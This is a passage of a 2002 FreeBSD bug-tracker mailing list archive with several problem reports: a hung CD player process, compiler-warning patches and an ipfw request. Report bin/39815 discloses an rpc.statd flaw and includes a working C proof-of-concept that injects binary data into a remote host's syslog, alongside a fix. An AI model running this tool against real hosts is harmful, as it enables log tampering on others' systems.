&maxdsiz, 0, "Max data size"); > > +SYSCTL_QUAD(_kern, OID_AUTO, dflssiz, CTLFLAG_RD, > > + &dflssiz, 0, "Initial max stack size"); > > +SYSCTL_QUAD(_kern, OID_AUTO, maxssiz, CTLFLAG_RD, > > + &maxssiz, 0, "Max stack size"); > > +SYSCTL_QUAD(_kern, OID_AUTO, sgrowsiz, CTLFLAG_RD, > > + &sgrowsiz, 0, "Amount to grow stack"); [snip] > Support for intmax_t's might not even be needed yet, or might not apply. > Most of the `siz' variables here have a wrong type (u_quad_t). They > should have type vm_size_t or possibly size_t. But there is a problem > importing and exporting variables with a typedef'ed types via sysctl() > and/or TUNABLE*_FETCH(). Sysctl and the tunable mechanism only support > a limited number of types. Even u_quad_t's are not supported. Large > u_quad_t's are clipped to QUAD_MAX, without checking for overflow of > course. u_quad_t's for the `siz' variables only work because the sizes > are normally < QUAD_MAX even on 64-bit machines. so, what to do ? Cyrille. -- Cyrille Lefevre mailto:cyrille.lefevre@laposte.net 12, Rue de Bizerte 75017 Paris http://clefevre.fr.st tel/fax: +33 (0)1 45 22 83 85 gsm: +33 (0)6 80 94 76 63 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 19: 0:23 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id ABA7E37B403 for ; Mon, 24 Jun 2002 19:00:11 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5P20B062939; Mon, 24 Jun 2002 19:00:11 -0700 (PDT) (envelope-from gnats) Received: from nwww.freebsd.org (www.FreeBSD.org [216.136.204.117]) by hub.freebsd.org (Postfix) with ESMTP id 432BB37B400 for ; Mon, 24 Jun 2002 18:55:39 -0700 (PDT) Received: from www.freebsd.org (localhost [127.0.0.1]) by nwww.freebsd.org (8.12.2/8.12.2) with ESMTP id g5P1tchG051619 for ; Mon, 24 Jun 2002 18:55:38 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.2/8.12.2/Submit) id g5P1tcaR051618; Mon, 24 Jun 2002 18:55:38 -0700 (PDT) Message-Id: <200206250155.g5P1tcaR051618@www.freebsd.org> Date: Mon, 24 Jun 2002 18:55:38 -0700 (PDT) From: Andriy Gapon To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: kern/39813: program hangs in atprq state permanently Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39813 >Category: kern >Synopsis: program hangs in atprq state permanently >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Jun 24 19:00:11 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Andriy Gapon >Release: FreeBSD 4.6 >Organization: >Environment: FreeBSD edge.icyb.net 4.6-RELEASE FreeBSD 4.6-RELEASE #0: Wed Jun 19 19:50:32 EDT 2002 avg@edge.icyb.net:/sys-devel/obj/sys-devel/src/sys/EDGE i386 >Description: xmms program playing cdrom (/dev/acd0c) went into atprq state and remained in it indefinetly, it was imposible to kill/terminate that program by any means. p4:edge-21:47>fstat /dev/acd0c USER CMD PID FD MOUNT INUM MODE SZ|DV R/W NAME avg xmms 40123 12 / 6699 crw-r----- racd0c r /dev/acd0c p4:edge-21:53>ps -o pid,command,ruser,state,wchan | fgrep 40123 40123 /usr/X11R6/bin/x avg Ds atprq >How-To-Repeat: dunno >Fix: dunno >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 19:10:21 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9FBBF37B408 for ; Mon, 24 Jun 2002 19:10:02 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5P2A2K67994; Mon, 24 Jun 2002 19:10:02 -0700 (PDT) (envelope-from gnats) Received: from xkulesh.vol.cz (xkulesh.vol.cz [195.250.154.106]) by hub.freebsd.org (Postfix) with ESMTP id 7496437B407 for ; Mon, 24 Jun 2002 19:05:39 -0700 (PDT) Received: from obluda.cz (localhost [127.0.0.1]) by xkulesh.vol.cz (8.12.3/8.12.3) with ESMTP id g5P25aTx054187 for ; Tue, 25 Jun 2002 04:05:37 +0200 (CEST) (envelope-from dan@obluda.cz) Received: (from root@localhost) by xkulesh.vol.cz (8.12.4/8.12.4/Submit) id g5P1c2k2053231; Tue, 25 Jun 2002 03:38:02 +0200 (CEST) Message-Id: <200206250138.g5P1c2k2053231@xkulesh.vol.cz> Date: Tue, 25 Jun 2002 03:38:02 +0200 (CEST) From: Dan Lukes Reply-To: Dan Lukes To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: bin/39816: cleaning sbin/camcontrol code from warnings Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39816 >Category: bin >Synopsis: cleaning sbin/camcontrol code from warnings >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Jun 24 19:10:02 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Dan Lukes >Release: FreeBSD 4.6-STABLE i386 >Organization: Obludarium >Environment: System: FreeBSD xkulesh.vol.cz 4.6-STABLE FreeBSD sbin/camcontrol/camcontrol.c,v 1.21.2.12 2002/04/07 03:44:49 >Description: I want to clean some warnings from code. sbin/camcontrol/camcontrol.c: In function `rescan_or_reset_bus': 1050: warning: unused variable `curbus' The variable is really unused >How-To-Repeat: N/A >Fix: --- sbin/camcontrol/camcontrol.c.ORIG Mon Apr 8 01:16:19 2002 +++ sbin/camcontrol/camcontrol.c Tue Jun 25 03:37:14 2002 @@ -1047,7 +1047,6 @@ rescan_or_reset_bus(int bus, int rescan) { union ccb ccb, matchccb; - int curbus; int fd, retval; int bufsize; >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 19:10:32 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 214ED37B40A for ; Mon, 24 Jun 2002 19:10:03 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5P2A2N68004; Mon, 24 Jun 2002 19:10:02 -0700 (PDT) (envelope-from gnats) Received: from xkulesh.vol.cz (xkulesh.vol.cz [195.250.154.106]) by hub.freebsd.org (Postfix) with ESMTP id 67E7237B401 for ; Mon, 24 Jun 2002 19:05:39 -0700 (PDT) Received: from obluda.cz (localhost [127.0.0.1]) by xkulesh.vol.cz (8.12.3/8.12.3) with ESMTP id g5P25aTt054187 for ; Tue, 25 Jun 2002 04:05:36 +0200 (CEST) (envelope-from dan@obluda.cz) Received: (from root@localhost) by obluda.cz (8.12.4/8.12.4/Submit) id g5P1waQO054081; Tue, 25 Jun 2002 03:58:36 +0200 (CEST) Message-Id: <200206250158.g5P1waQO054081@obluda.cz> Date: Tue, 25 Jun 2002 03:58:36 +0200 (CEST) From: Dan Lukes Reply-To: Dan Lukes To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: bin/39817: cleaning sbin/disklabel code from warnings Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39817 >Category: bin >Synopsis: cleaning sbin/disklabel code from warnings >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Jun 24 19:10:02 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Dan Lukes >Release: FreeBSD 4.6-STABLE i386 >Organization: Obludarium >Environment: System: FreeBSD xkulesh.vol.cz 4.6-STABLE FreeBSD sbin/disklabel/disklabel.c,v 1.28.2.9 2001/08/01 06:07:14 >Description: I want to clean some warnings from code. sbin/disklabel/disklabel.c: In function `checklabel': 1445: warning: int format, long int arg (arg 3) unsigned long 'total_percent' printf'ed as %d 1464: warning: unknown conversion type character `'' in format '%' character must be doubled in format string 1497: warning: long int format, int arg (arg 3) u_int32_t (e.g. unsigned int) pp->p_offset printf'ed as %ld >How-To-Repeat: N/A >Fix: --- sbin/disklabel/disklabel.c.ORIG Tue Aug 7 20:10:14 2001 +++ sbin/disklabel/disklabel.c Tue Jun 25 03:55:30 2002 @@ -1441,7 +1441,7 @@ if (total_percent != 0) { long free_space = lp->d_secperunit - total_size; if (total_percent > 100) { - fprintf(stderr,"total percentage %d is greater than 100\n", + fprintf(stderr,"total percentage %lu is greater than 100\n", total_percent); errors++; } @@ -1460,7 +1460,7 @@ } } else { fprintf(stderr, - "%ld sectors available to give to '*' and '%' partitions\n", + "%ld sectors available to give to '*' and '%%' partitions\n", free_space); errors++; /* fix? set all % partitions to size 0? */ @@ -1493,7 +1493,7 @@ if (pp->p_offset < current_offset && seen_default_offset && i != FULL_DISK_PART) { fprintf(stderr, -"Offset %ld for partition %c overlaps previous partition which ends at %ld\n", +"Offset %d for partition %c overlaps previous partition which ends at %ld\n", pp->p_offset,i+'a',current_offset); fprintf(stderr, "Labels with any *'s for offset must be in ascending order by sector\n"); >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 19:10:45 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B9C6E37B404 for ; Mon, 24 Jun 2002 19:10:01 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5P2A1P67974; Mon, 24 Jun 2002 19:10:01 -0700 (PDT) (envelope-from gnats) Received: from nwww.freebsd.org (www.FreeBSD.org [216.136.204.117]) by hub.freebsd.org (Postfix) with ESMTP id BFED437B40B for ; Mon, 24 Jun 2002 19:04:53 -0700 (PDT) Received: from www.freebsd.org (localhost [127.0.0.1]) by nwww.freebsd.org (8.12.2/8.12.2) with ESMTP id g5P24rhG052852 for ; Mon, 24 Jun 2002 19:04:53 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.2/8.12.2/Submit) id g5P24r2A052851; Mon, 24 Jun 2002 19:04:53 -0700 (PDT) Message-Id: <200206250204.g5P24r2A052851@www.freebsd.org> Date: Mon, 24 Jun 2002 19:04:53 -0700 (PDT) From: Chris Pepper To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: kern/39814: GENERIC kernel should include ipfw Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39814 >Category: kern >Synopsis: GENERIC kernel should include ipfw >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Jun 24 19:10:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Chris Pepper >Release: 4.6-STABLE >Organization: >Environment: FreeBSD guest.reppep.com 4.6-STABLE FreeBSD 4.6-STABLE #0: Tue Jun 18 21:27:59 EDT 2002 pepper@guest.reppep.com:/usr/obj/usr/src/sys/GENERIC i386 >Description: ipfw should be in the GENERIC (default) kernel configuration. Firewalling shouldn't require a kernel rebuild. Further, this increases the likelihood of shooting oneself in the foot when activating firewalling, if it's not yet configured properly (over providing a non-restrictive default ruleset, and then tightening it to cause a change). >How-To-Repeat: Install 4.5-RELEASE >Fix: Add IPFIREWALL (v4) options to GENERIC, and if IPv6 is activated, add IPFIREWALL (v6) options as well. options IPFIREWALL #firewall options IPFIREWALL_VERBOSE #enable logging to syslogd(8) options IPFIREWALL_FORWARD #enable transparent proxy support options IPFIREWALL_VERBOSE_LIMIT=100 #limit verbosity options IPFIREWALL_DEFAULT_TO_ACCEPT #allow everything by default options IPV6FIREWALL #firewall for IPv6 options IPV6FIREWALL_VERBOSE options IPV6FIREWALL_VERBOSE_LIMIT=100 options IPV6FIREWALL_DEFAULT_TO_ACCEPT >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 19:11: 5 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 332BC37B40C for ; Mon, 24 Jun 2002 19:10:04 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5P2A3J68013; Mon, 24 Jun 2002 19:10:03 -0700 (PDT) (envelope-from gnats) Received: from xkulesh.vol.cz (xkulesh.vol.cz [195.250.154.106]) by hub.freebsd.org (Postfix) with ESMTP id 736CA37B405 for ; Mon, 24 Jun 2002 19:05:39 -0700 (PDT) Received: from obluda.cz (localhost [127.0.0.1]) by xkulesh.vol.cz (8.12.3/8.12.3) with ESMTP id g5P25aTv054187 for ; Tue, 25 Jun 2002 04:05:37 +0200 (CEST) (envelope-from dan@obluda.cz) Received: (from root@localhost) by xkulesh.vol.cz (8.12.4/8.12.4/Submit) id g5P1WlwR053123; Tue, 25 Jun 2002 03:32:47 +0200 (CEST) Message-Id: <200206250132.g5P1WlwR053123@xkulesh.vol.cz> Date: Tue, 25 Jun 2002 03:32:47 +0200 (CEST) From: Dan Lukes Reply-To: Dan Lukes To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: bin/39818: cleaning bin/sh code from warnings Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39818 >Category: bin >Synopsis: cleaning sbin/atm code from warnings >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Jun 24 19:10:02 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Dan Lukes >Release: FreeBSD 4.6-STABLE i386 >Organization: Obludarium >Environment: System: FreeBSD xkulesh.vol.cz 4.6-STABLE FreeBSD sbin/atm/fore_dnld/fore_dnld.c,v 1.6.2.2 2000/12/11 01:03:24 >Description: I want to clean some warnings from code. sbin/atm/fore_dnld/fore_dnld.c: In function `loadmicrocode': 689: warning: unused variable `cnt' 688: warning: unused variable `n' 'cnt' is really unused, 'n' is used in sun's part of code only ---- /usr/src/sbin/atm/fore_dnld/fore_dnld.c: In function `main': 1341: warning: unsigned int format, u_long arg (arg 2) 1349: warning: unsigned int format, u_long arg (arg 2) 1349: warning: unsigned int format, u_long arg (arg 3) unsigned LONG's hb1,hb2,hb3 printf'ed as %x >How-To-Repeat: N/A >Fix: --- fore_dnld/fore_dnld.c.ORIG Sat Dec 16 23:44:09 2000 +++ fore_dnld/fore_dnld.c Tue Jun 25 03:08:51 2002 @@ -684,9 +684,8 @@ u_long w; char c[4]; } w1, w2; -#endif int n; - int cnt = 0; +#endif u_char *bufp; u_long *lp; @@ -1338,7 +1337,7 @@ hb3 = CP_READ(Mon->mon_bstat); if (hb3 != BOOT_RUNNING) { if (verbose) - printf("bstat %x\n", hb3); + printf("bstat %lx\n", hb3); continue; } @@ -1346,7 +1345,7 @@ delay(1); hb2 = CP_READ(aap->aali_heartbeat); if (verbose) - printf("hb %x %x\n", hb1, hb2); + printf("hb %lx %lx\n", hb1, hb2); if (hb1 < hb2) break; } >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 19:11:22 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 587E137B40E for ; Mon, 24 Jun 2002 19:10:04 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5P2A4M68023; Mon, 24 Jun 2002 19:10:04 -0700 (PDT) (envelope-from gnats) Received: from xkulesh.vol.cz (xkulesh.vol.cz [195.250.154.106]) by hub.freebsd.org (Postfix) with ESMTP id 6819D37B403 for ; Mon, 24 Jun 2002 19:05:39 -0700 (PDT) Received: from obluda.cz (localhost [127.0.0.1]) by xkulesh.vol.cz (8.12.3/8.12.3) with ESMTP id g5P25aU1054187 for ; Tue, 25 Jun 2002 04:05:37 +0200 (CEST) (envelope-from dan@obluda.cz) Received: (from root@localhost) by xkulesh.vol.cz (8.12.4/8.12.4/Submit) id g5P0di0U052472; Tue, 25 Jun 2002 02:39:45 +0200 (CEST) Message-Id: <200206250039.g5P0di0U052472@xkulesh.vol.cz> Date: Tue, 25 Jun 2002 02:39:45 +0200 (CEST) From: Dan Lukes Reply-To: Dan Lukes To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: bin/39819: cleaning bin/sh code from warnings Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39819 >Category: bin >Synopsis: cleaning bin/sh code from warnings >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Jun 24 19:10:03 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Dan Lukes >Release: FreeBSD 4.6-STABLE i386 >Organization: Obludarium >Environment: System: FreeBSD xkulesh.vol.cz 4.6-STABLE FreeBSD bin/sh/memalloc.h,v 1.6.2.1 2000/09/06 08:38:45 bin/sh/memalloc.c,v 1.15.2.1 2000/09/06 08:38:45 bin/sh/var.c,v 1.15 1999/08/27 23:15:26 >Description: I want to clean some warnings from code. bin/sh/../../usr.bin/printf/printf.c:223: warning: passing arg 1 of `savestr' discards qualifiers from pointer target type It is caused by missing 'const' qualifier from savestr declaration. savestr(s) call scopy(s,r), the scopy is defined as strcpy(r,s) s is (const char *) in strcpy, savestr doesn't modify the s anyway, so it can be declared as (const char *) ======== bin/sh/var.c: In function `setvareq':312: warning: field width is not type int (arg 2) 'len' variable is declared as size_t (e.g. unsigned int), but used on the place where int is allowed only >How-To-Repeat: N/A >Fix: --- bin/sh/memalloc.h.ORIG Tue Oct 3 04:43:15 2000 +++ bin/sh/memalloc.h Mon Jun 24 22:03:04 2002 @@ -52,7 +52,7 @@ pointer ckmalloc __P((int)); pointer ckrealloc __P((pointer, int)); -char *savestr __P((char *)); +char *savestr __P((const char *)); pointer stalloc __P((int)); void stunalloc __P((pointer)); void setstackmark __P((struct stackmark *)); --- bin/sh/memalloc.c.ORIG Tue Oct 3 04:43:15 2000 +++ bin/sh/memalloc.c Mon Jun 24 22:02:21 2002 @@ -89,7 +89,7 @@ char * savestr(s) - char *s; + const char *s; { char *p; --- bin/sh/var.c.ORIG Sat Aug 28 01:15:26 1999 +++ bin/sh/var.c Mon Jun 24 22:44:08 2002 @@ -308,7 +308,7 @@ for (vp = *vpp ; vp ; vp = vp->next) { if (varequal(s, vp->text)) { if (vp->flags & VREADONLY) { - size_t len = strchr(s, '=') - s; + int len = strchr(s, '=') - s; error("%.*s: is read only", len, s); } INTOFF; >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 19:11:45 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 63D6C37B406 for ; Mon, 24 Jun 2002 19:10:02 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5P2A2a67985; Mon, 24 Jun 2002 19:10:02 -0700 (PDT) (envelope-from gnats) Received: from staff.seccuris.com (staff.seccuris.com [204.112.0.40]) by hub.freebsd.org (Postfix) with SMTP id 33C1237B40D for ; Mon, 24 Jun 2002 19:04:54 -0700 (PDT) Received: (qmail 33487 invoked by uid 1006); 25 Jun 2002 02:23:18 -0000 Message-Id: <20020625022318.33486.qmail@staff.seccuris.com> Date: 25 Jun 2002 02:23:18 -0000 From: "C.S.Peron" Reply-To: "C.S.Peron" To: FreeBSD-gnats-submit@FreeBSD.org Cc: cperon@seccuris.com X-Send-Pr-Version: 3.113 Subject: bin/39815: rpc.statd bug Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39815 >Category: bin >Synopsis: rpc.statd bug >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: doc-bug >Submitter-Id: current-users >Arrival-Date: Mon Jun 24 19:10:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: C.S. Peron >Release: FreeBSD 4.6-STABLE i386 >Organization: seccruis inc >Environment: System: FreeBSD icmp.dhs.org 4.6-STABLE FreeBSD 4.6-STABLE #15: Tue Jun 18 18:55:01 CDT 2002 modulus@icmp.dhs.org:/usr/src/sys/compile/opcode i386 >Description: The sm_stat_1_svc() does not check to see if the supplied hostname was a valid hostname. Remote users can supply binary or other non ascii control code as in their RPC query. These control codes can cause external syslog parser to exit prematurely or and mess up terminals when syslog files are viewed. As the supplied argument to clnt_call(SM_MON) from the client should be a hostname, there is no reason why binary characters should appear in the request. Unless the request is tampered with or malicious in nature. So when rpc.statd does get a hostname that it can not resolve, it logs it to syslog. Even if the hostname contains invaid binary characters. >How-To-Repeat: I have written a program that will allow you to scribble either text or binary data to a remote system's syslog. --------------<< snip snip snip /* * This program was written by C.S. Peron at seccuris labs * (cperon@seccuris.com) or (maneo@bsdpro.com) * to test the RPC.statd bug. * * usage: color [-r] [-h hostname] [-m message] * * -r - write random binary data to the remote host's syslog files * -m - supply `message' to send to remote host's syslog files * -h - specify remote host to connect to. Default is localhost * * This program was written for FreeBSD. * * To compile: * cc -o color color.c -lrpcsvc * */ #include #include #include #include #include static struct timeval TIMEOUT = { 10, 0 }; int usage(basename) char *basename; { fprintf(stderr,"usage: %s [-r] [-h hostname] [-m message]\n", basename); exit(1); } struct sm_stat_res * sm_mon_1(argp, clnt) struct mon *argp; CLIENT *clnt; { static struct sm_stat_res res; bzero((char *)&res, sizeof(res)); if (clnt_call(clnt, SM_MON, xdr_mon, argp, xdr_sm_stat_res, &res, TIMEOUT) != RPC_SUCCESS) { return (NULL); } return (&res); } #define RANDOM 0x1 char *hflag = NULL; char *mflag = NULL; int main(int argc, char *argv[]) { unsigned opts = 0; CLIENT *cli; struct mon mon; struct sm_stat_res *res; int ch, cc; unsigned int seed; FILE *fp; char *prog; fp = stdin; prog = argv[0]; if (*prog == '.' && *(prog + 1) == '/') prog += 2; while ((ch = getopt(argc, argv, "rh:m:")) != -1) switch (ch) { case 'r': opts |= RANDOM; break; case 'h': hflag = optarg; break; case 'm': mflag = optarg; break; default: usage(prog); } if (mflag && (opts & RANDOM)) { fprintf(stderr,"error: -m and -r flags are not compatible.\n"); exit(1); } if (!mflag && !(opts & RANDOM)) { fprintf(stderr,"error: -m OR -r flag required.\n"); exit(1); } if (argc < 2) { fprintf(stderr,"usage: %s [-r] [-h host] [-m message] \n", prog); exit(1); } cli = clnt_create(hflag ? hflag : "localhost", SM_PROG, SM_VERS, "udp"); if (!cli) { fprintf(stderr, "fatal: Failed to create client\n"); exit(1); } if (opts & RANDOM) { if ((mflag = malloc(1000)) == 0) { fprintf(stderr, "fatal: exhausted memory.\n"); exit(1); } for (cc = 0; cc < 1000; cc++) { /* permute S-Boxes */ arc4random_stir(); /* * Fill buffer with NON-ascii random junk */ mflag[cc] = (arc4random() % (10000 - 128 + 1) + 128); } } mon.mon_id.mon_name = mflag; mon.mon_id.my_id.my_name = mflag; mon.mon_id.my_id.my_prog = SM_PROG; mon.mon_id.my_id.my_vers = SM_VERS; mon.mon_id.my_id.my_proc = 1; if (res = sm_mon_1(&mon, cli)) printf("diagnostic: delivered data to host\n"); else printf("Failed to deliver data\n"); if (opts & RANDOM) free(mflag); return 0; } >Fix: I have enclosed the fix: >Release-Note: >Audit-Trail: >Unformatted: >>--------- snip snip snip Only in /usr/bugfixes/rpc.statd: exp diff -u /usr/src/usr.sbin/rpc.statd/procs.c /usr/bugfixes/rpc.statd/procs.c --- /usr/src/usr.sbin/rpc.statd/procs.c Fri Aug 27 20:19:37 1999 +++ /usr/bugfixes/rpc.statd/procs.c Tue May 7 19:15:39 2002 @@ -47,7 +47,38 @@ #include "statd.h" -/* sm_stat_1 --------------------------------------------------------------- */ +/* sm_check_hostname -------------------------------------------------------- */ +/* + * Purpose: Check `mon_name' member of sm_name struct to ensure that the array + * consists only of printable characters. + * + * Returns: TRUE if hostname is good. FALSE if hostname contains binary or + * otherwise non-printable characters. + */ + +int sm_check_hostname(char *arg) +{ + char *hostname; + unsigned char c; + + hostname = arg; + + if (!isalpha(*hostname)) + return 0; + + while (*hostname) + { + c = *hostname++; + + if (isdigit(c) || isalpha(c) || (c == '.') || (c == '-')) + continue; + + return 0; + } + return 1; +} + +/* sm_stat_1 --------------------------------------------------------------- */ /* Purpose: RPC call to enquire if a host can be monitored Returns: TRUE for any hostname that can be looked up to give @@ -57,16 +88,25 @@ struct sm_stat_res *sm_stat_1_svc(sm_name *arg, struct svc_req *req) { static sm_stat_res res; + static int err; - if (debug) syslog(LOG_DEBUG, "stat called for host %s", arg->mon_name); - - if (gethostbyname(arg->mon_name)) res.res_stat = stat_succ; - else - { - syslog(LOG_ERR, "invalid hostname to sm_stat: %s", arg->mon_name); + err = 1; + if ((err = sm_check_hostname(arg->mon_name)) == 0) + { + syslog(LOG_ERR, "sm_stat: hostname contained invalid characters."); res.res_stat = stat_fail; } - + if (err != 0) + { + if (debug) syslog(LOG_DEBUG, "stat called for host %s", arg->mon_name); + + if (gethostbyname(arg->mon_name)) res.res_stat = stat_succ; + else + { + syslog(LOG_ERR, "invalid hostname to sm_stat: %s", arg->mon_name); + res.res_stat = stat_fail; + } + } res.state = status_info->ourState; return (&res); } @@ -83,50 +123,58 @@ struct sm_stat_res *sm_mon_1_svc(mon *arg, struct svc_req *req) { static sm_stat_res res; + static int err; HostInfo *hp; MonList *lp; - if (debug) + if ((err = sm_check_hostname(arg->mon_id.mon_name)) == 0) + { + syslog(LOG_ERR, "sm_stat: hostname contained invalid characters."); + res.res_stat = stat_fail; + } + + if (err != 0) { - syslog(LOG_DEBUG, "monitor request for host %s", arg->mon_id.mon_name); - syslog(LOG_DEBUG, "recall host: %s prog: %d ver: %d proc: %d", + if (debug) + { + syslog(LOG_DEBUG, "monitor request for host %s", arg->mon_id.mon_name); + syslog(LOG_DEBUG, "recall host: %s prog: %d ver: %d proc: %d", arg->mon_id.mon_name, arg->mon_id.my_id.my_name, arg->mon_id.my_id.my_prog, arg->mon_id.my_id.my_vers, arg->mon_id.my_id.my_proc); - } - - res.res_stat = stat_fail; /* Assume fail until set otherwise */ - res.state = status_info->ourState; + } + res.res_stat = stat_fail; /* Assume fail until set otherwise */ + res.state = status_info->ourState; - /* Find existing host entry, or create one if not found */ - /* If find_host() fails, it will have logged the error already. */ - if (!gethostbyname(arg->mon_id.mon_name)) - { - syslog(LOG_ERR, "Invalid hostname to sm_mon: %s", arg->mon_id.mon_name); - } - else if ((hp = find_host(arg->mon_id.mon_name, TRUE))) - { - lp = (MonList *)malloc(sizeof(MonList)); - if (!lp) + /* Find existing host entry, or create one if not found */ + /* If find_host() fails, it will have logged the error already. */ + if (!gethostbyname(arg->mon_id.mon_name)) { - syslog(LOG_ERR, "Out of memory"); + syslog(LOG_ERR, "Invalid hostname to sm_mon: %s", arg->mon_id.mon_name); } - else + else if ((hp = find_host(arg->mon_id.mon_name, TRUE))) { - strncpy(lp->notifyHost, arg->mon_id.my_id.my_name, SM_MAXSTRLEN); - lp->notifyProg = arg->mon_id.my_id.my_prog; - lp->notifyVers = arg->mon_id.my_id.my_vers; - lp->notifyProc = arg->mon_id.my_id.my_proc; - memcpy(lp->notifyData, arg->priv, sizeof(lp->notifyData)); - - lp->next = hp->monList; - hp->monList = lp; - sync_file(); - - res.res_stat = stat_succ; /* Report success */ + lp = (MonList 